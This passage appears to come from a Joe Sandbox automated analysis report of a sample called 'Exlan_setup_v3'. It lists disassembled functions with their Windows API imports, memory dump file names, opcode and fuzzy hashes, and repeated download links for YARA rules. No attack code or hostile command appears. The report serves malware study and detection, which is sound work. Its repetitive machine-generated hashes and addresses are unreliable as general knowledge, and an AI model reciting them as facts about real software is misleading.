std::tr1::_Xweak.LIBCPMT ref: 6CFC4450
SafeArrayDestroy.OLEAUT32(?), ref: 6CFC446D
VariantClear.OLEAUT32(?), ref: 6CFC447D
VariantClear.OLEAUT32(?), ref: 6CFC4483

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
String ID:
API String ID: 1774866819-0
Opcode ID: cdf84101f7edf06da6a6f70a0ba97096ec5bbf43e21e13701b11b67b6824f006
Instruction ID: 744e52f6e37c00532108fb9c821f93cf97a974999799c678ad4ca7da979a85ce
Opcode Fuzzy Hash: cdf84101f7edf06da6a6f70a0ba97096ec5bbf43e21e13701b11b67b6824f006
Instruction Fuzzy Hash: 29B12875600609AFCB14DF99C884EEAB7F5BF8D310F158568E50AABB91DA34F841CB60

Function 6CFCC850 Relevance: 13.8, APIs: 9, Instructions: 271COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CFCC88F
VariantInit.OLEAUT32(?), ref: 6CFCC895
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CFCC8A0
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CFCC8D5
VariantClear.OLEAUT32(?), ref: 6CFCC8E1
std::tr1::_Xweak.LIBCPMT ref: 6CFCCB1C
SafeArrayDestroy.OLEAUT32(?), ref: 6CFCCB39
VariantClear.OLEAUT32(?), ref: 6CFCCB49
VariantClear.OLEAUT32(?), ref: 6CFCCB4F

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
String ID:
API String ID: 1774866819-0
Opcode ID: a7b9c8db1182225b7c455d99912e082491aa5f31b8228d1914aac5e46a78d765
Instruction ID: 85e457e7786cb40a23a94c7ab61bf5a7f618e48fff07e0cf954a2267d27e5689
Opcode Fuzzy Hash: a7b9c8db1182225b7c455d99912e082491aa5f31b8228d1914aac5e46a78d765
Instruction Fuzzy Hash: 2CB12B7560060AAFCB14DF99C884EEAB7F5BF8D310F15856CE506ABB91DA34F841CB60

Function 6CFCC530 Relevance: 13.8, APIs: 9, Instructions: 259COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CFCC56F
VariantInit.OLEAUT32(?), ref: 6CFCC575
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CFCC580
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CFCC5B5
VariantClear.OLEAUT32(?), ref: 6CFCC5C1
std::tr1::_Xweak.LIBCPMT ref: 6CFCC7D4
SafeArrayDestroy.OLEAUT32(?), ref: 6CFCC7F1
VariantClear.OLEAUT32(?), ref: 6CFCC801
VariantClear.OLEAUT32(?), ref: 6CFCC807

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
String ID:
API String ID: 1774866819-0
Opcode ID: 61b1ea8780da351bfd733e907b022250436cafa8c425b18f1230445956c44248
Instruction ID: c1a99f0170aed88d72535b1ba8176c5653dd0d61a6b4df946d694db47fb011da
Opcode Fuzzy Hash: 61b1ea8780da351bfd733e907b022250436cafa8c425b18f1230445956c44248
Instruction Fuzzy Hash: 58A1397560060AAFCB14DF99C884EAAB7B9BF8D310F15856CE506ABB91D734F841CB60

Function 6CFAFC30 Relevance: 13.7, APIs: 9, Instructions: 154fileCOMMON

Download Yara Rule

APIs

UnmapViewOfFile.KERNEL32(00000000,?,?,00000000,5A45ABCE), ref: 6CFAFC98
CloseHandle.KERNEL32(FFFFFFFF,?,?,00000000,5A45ABCE), ref: 6CFAFCAD
CloseHandle.KERNEL32(?,?,?,00000000,5A45ABCE), ref: 6CFAFCB7
SetLastError.KERNEL32(00000000,?,?,00000000,5A45ABCE), ref: 6CFAFCBA
CreateFileW.KERNEL32(?,-00000001,00000001,00000000,00000003,00000000,00000000,?,?,00000000,5A45ABCE), ref: 6CFAFD01
GetFileSizeEx.KERNEL32(00000000,?,?,?,00000000,5A45ABCE), ref: 6CFAFD14
GetLastError.KERNEL32(?,?,00000000,5A45ABCE), ref: 6CFAFD2A
CreateFileMappingW.KERNELBASE(?,00000000,?,00000000,00000000,00000000,?,?,00000000,5A45ABCE), ref: 6CFAFD6B
MapViewOfFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,?,00000000,5A45ABCE), ref: 6CFAFD98

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: File$CloseCreateErrorHandleLastView$MappingSizeUnmap
String ID:
API String ID: 1303881157-0
Opcode ID: 2c60c752b8c762e0dcaeda3cae1ca824d0453d7a00be5dd833014f446de2a2d0
Instruction ID: e56dabb6a52369b06dcdc301ff03c8b26d71b840da90a157e9fbf937a8d02bdd
Opcode Fuzzy Hash: 2c60c752b8c762e0dcaeda3cae1ca824d0453d7a00be5dd833014f446de2a2d0
Instruction Fuzzy Hash: 0A51E3B5604301EBDB008FB5C8C4B5ABBA4AB49364F2586A9EC18CF7C5D770D946CBE0

Function 6CFC6880 Relevance: 13.6, APIs: 9, Instructions: 117COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CFC68B2
VariantInit.OLEAUT32(?), ref: 6CFC68BD
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CFC68D7
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CFC68FD
VariantClear.OLEAUT32(?), ref: 6CFC6909
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CFC6923
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CFC6981
VariantClear.OLEAUT32(?), ref: 6CFC699E
VariantClear.OLEAUT32(?), ref: 6CFC69A4

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Variant$ArraySafe$Clear$ElementInit$CreateDestroyVector
String ID:
API String ID: 3529038988-0
Opcode ID: 610ec4f0b8b90307fc4ff5bf1f582ee9200e28f87110144df660ae950ce7675a
Instruction ID: 996b3823e8a3732e472c529d889723ed9bd1a2f1c05efa5c2dd707d0d5639f17
Opcode Fuzzy Hash: 610ec4f0b8b90307fc4ff5bf1f582ee9200e28f87110144df660ae950ce7675a
Instruction Fuzzy Hash: 42417DB2A05209AFDB00DFA4C844BEFBBB8FF99314F154119E905E7240E771E905CBA1

Function 6CFBC020 Relevance: 12.3, APIs: 8, Instructions: 309COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CFBC074
VariantInit.OLEAUT32(?), ref: 6CFBC07B
VariantInit.OLEAUT32(?), ref: 6CFBC082
VariantInit.OLEAUT32(?), ref: 6CFBC089
VariantClear.OLEAUT32(?), ref: 6CFBC312
VariantClear.OLEAUT32(?), ref: 6CFBC319
VariantClear.OLEAUT32(?), ref: 6CFBC320
VariantClear.OLEAUT32(?), ref: 6CFBC327

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Variant$ClearInit
String ID:
API String ID: 2610073882-0
Opcode ID: 645d50fc20d219c1b45fd589a184c21d25594313a8020c25560a1187dc13226f
Instruction ID: 1e29ec06b518c795a57dbd5b94d85e50ef57b033571e9ed4b9a0dda13b1f31a3
Opcode Fuzzy Hash: 645d50fc20d219c1b45fd589a184c21d25594313a8020c25560a1187dc13226f
Instruction Fuzzy Hash: F2C147716087009FD300EF59C880A5BB7E5BFC9304F658A4DF598AB365D731E845CB92

Function 6CFBB300 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 326COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CFBB3EB
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CFBB3FB
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CFBB429
SafeArrayDestroy.OLEAUT32(?), ref: 6CFBB525
VariantClear.OLEAUT32(?), ref: 6CFBB5E5

Strings

@, xrefs: 6CFBB3D7

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: ArraySafe$Bound$ClearDestroyElementVariant
String ID: @
API String ID: 3214203402-2766056989
Opcode ID: e61a398bf50447a4ba3cd987c67959d7324451b1c9de702a609121531fd40a61
Instruction ID: b6ed39367673bb43162285042043697a2d797a6263cf3bb58e10c063cd4e2f18
Opcode Fuzzy Hash: e61a398bf50447a4ba3cd987c67959d7324451b1c9de702a609121531fd40a61
Instruction Fuzzy Hash: 4FD17A71E01249CFDB00DFA9C9C4AADBBB6FF48308F2485A9E515AB754D730AA45CF90

Function 6CFC6B10 Relevance: 9.4, APIs: 6, Instructions: 364COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(00000000,?,?), ref: 6CFC6C8B
SafeArrayGetUBound.OLEAUT32(00000000,?,?), ref: 6CFC6CA6
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6CFC6CC7

Part of subcall function 6CFC5760: std::tr1::_Xweak.LIBCPMT ref: 6CFC5769

SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6CFC6CF9

Part of subcall function 6D009BB5: _malloc.LIBCMT ref: 6D009BCF

SafeArrayDestroy.OLEAUT32(00000000), ref: 6CFC6F13
InterlockedCompareExchange.KERNEL32(6D04C6A4,45524548,4B4F4F4C), ref: 6CFC6F34

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: ArraySafe$BoundData$AccessCompareDestroyExchangeInterlockedUnaccessXweak_mallocstd::tr1::_
String ID:
API String ID: 2722669376-0
Opcode ID: f5a7d97c16c8e87afce25b6aedbf65e8c99c9a09d496a8016d5986227c3bf80a
Instruction ID: d9128105aaa9c2c466e469afd211bd053266b68d7e8a25614e61c95166ff9faf
Opcode Fuzzy Hash: f5a7d97c16c8e87afce25b6aedbf65e8c99c9a09d496a8016d5986227c3bf80a
Instruction Fuzzy Hash: 7FD1AEB1B042069FEB10CFA4C885BEB77B8AF45308F158569F905EB781D774E944CBA2

Function 6CFB16B0 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 487COMMON

Download Yara Rule

APIs

Part of subcall function 6D009BB5: _malloc.LIBCMT ref: 6D009BCF

std::tr1::_Xweak.LIBCPMT ref: 6CFB1B53
std::_Xinvalid_argument.LIBCPMT ref: 6CFB1B5D
std::exception::exception.LIBCMT ref: 6CFB1C43
__CxxThrowException@8.LIBCMT ref: 6CFB1C58

Strings

invalid vector<T> subscript, xrefs: 6CFB1B58

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argumentXweak_mallocstd::_std::exception::exceptionstd::tr1::_
String ID: invalid vector<T> subscript
API String ID: 3098024973-3016609489
Opcode ID: 75b301f7c816bcabee62717ca7b8d1d4f186218d010854860c19bc04b2d541ad
Instruction ID: 8f667fbe0ce4763c9e13d3c25c60416bafd64a8316939f775d882e2a838709a1
Opcode Fuzzy Hash: 75b301f7c816bcabee62717ca7b8d1d4f186218d010854860c19bc04b2d541ad
Instruction Fuzzy Hash: 2C224AB5C003099FDB24CFA5C4809EEBBF5BF48314F158A5DD55AAB750E774AA88CB80

Function 6CFBDB30 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(6CFC31EC), ref: 6CFBDB5E
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CFBDB6E
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CFBDB82
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CFBDBF1
VariantClear.OLEAUT32(?), ref: 6CFBDBFB

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: ArraySafe$Variant$ClearCreateDestroyElementInitVector
String ID:
API String ID: 182531043-0
Opcode ID: c00d70fa35c98be178f790a9cd29da2f3ad1696404df0bc399f8db3518cda86d
Instruction ID: 3d8414a62a326294f77d82e9cc45c249ccf092bd61076bf8646ef56402157400
Opcode Fuzzy Hash: c00d70fa35c98be178f790a9cd29da2f3ad1696404df0bc399f8db3518cda86d
Instruction Fuzzy Hash: 33319E7AA05205AFD700DF55C844EEEBBF8FF9A710F15825AE911A7740D734E801CBA0

Function 6D009BB5 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6D009BCF

Part of subcall function 6D009D66: __FF_MSGBANNER.LIBCMT ref: 6D009D7F
Part of subcall function 6D009D66: __NMSG_WRITE.LIBCMT ref: 6D009D86
Part of subcall function 6D009D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6D009BD4,6CFA1290,5A45ABCE), ref: 6D009DAB

std::exception::exception.LIBCMT ref: 6D009C04
std::exception::exception.LIBCMT ref: 6D009C1E
__CxxThrowException@8.LIBCMT ref: 6D009C2F

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID:
API String ID: 615853336-0
Opcode ID: ff5975c6c4f448c2386b1436d832042f1a5bef71e6ea759b49dc545858b0fd1a
Instruction ID: 4c3db7b94c1ee4207ec53e0af360a7bc636f92fd122e0240003a414638b22721
Opcode Fuzzy Hash: ff5975c6c4f448c2386b1436d832042f1a5bef71e6ea759b49dc545858b0fd1a
Instruction Fuzzy Hash: 2EF0C87141550AFAFF00EB69EE14FAD7AF8AB42718F190459D50097191DFB08A40C751

Function 6CFB9110 Relevance: 5.1, APIs: 4, Instructions: 122COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CFB913B
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CFB915C
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 6CFB9170
LeaveCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 6CFB9191

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 6e2b2d21e32c89c59ea9eb31119efec71d0ff123edd01debbca82f8de51bd327
Instruction ID: 8c30a7488f7ec3aa862ac29b29e5d25fab7461825565cd79d49b58ac32b65e09
Opcode Fuzzy Hash: 6e2b2d21e32c89c59ea9eb31119efec71d0ff123edd01debbca82f8de51bd327
Instruction Fuzzy Hash: 824171769002099FCB04DF99D8848EEBBB4FF99314B61859ED816AB700D730EA05CFE1

Function 6CFB8E20 Relevance: 4.7, APIs: 3, Instructions: 162COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 6CFB8E89
LeaveCriticalSection.KERNEL32(?,00000000), ref: 6CFB8EAD
_memset.LIBCMT ref: 6CFB8ED2

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: CriticalSection$EnterLeave_memset
String ID:
API String ID: 3751686142-0
Opcode ID: 0ec4c648831c59432313e05fb8d2730f0435376c7d369dc856618a4ad2ae8b6a
Instruction ID: 3ba8454d843513b245820736e7683d6fea5d7557c5c87c16774373dcda52f1ff
Opcode Fuzzy Hash: 0ec4c648831c59432313e05fb8d2730f0435376c7d369dc856618a4ad2ae8b6a
Instruction Fuzzy Hash: 42515D74601206EFDB04CF59C490F9AB7B6FF89304F20855DE91AAB781D731EA55CB90

Function 6CFC69C0 Relevance: 4.6, APIs: 3, Instructions: 128COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CFC6A08
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CFC6A15
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CFC6A41

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
